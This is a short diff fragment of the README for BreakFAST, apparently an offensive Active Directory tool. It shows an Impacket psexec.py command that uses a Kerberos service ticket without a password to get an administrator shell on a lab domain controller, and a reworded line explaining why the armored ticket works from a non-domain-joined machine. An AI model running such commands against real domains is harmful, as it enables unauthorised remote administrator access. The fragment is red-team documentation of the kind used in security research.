monsieurPale/BreakFAST/README.md

 psexec.py -dc-ip 10.0.2.15 -target-ip 10.0.2.15 -k -no-pass OCEAN.NET/Administrateur@WIN-D7FNC0765NG.OCEAN.NET
 ```

-The command should go throught as the `ST` is rightfully armored, despite not being on a domain-joined system and not having access to `lsass` (see [this blog](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/)), you should get the mighty shell:
+The command should go throught as the `ST` is correctly armored, despite not being emited from a domain-joined system using `lsass` (see [this blog](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/)) and you should receive the holy shell:

 ```
 Impacket v0.14.0.dev0+20251204.163933.2347bd3f - Copyright Fortra, LLC and its affiliated companies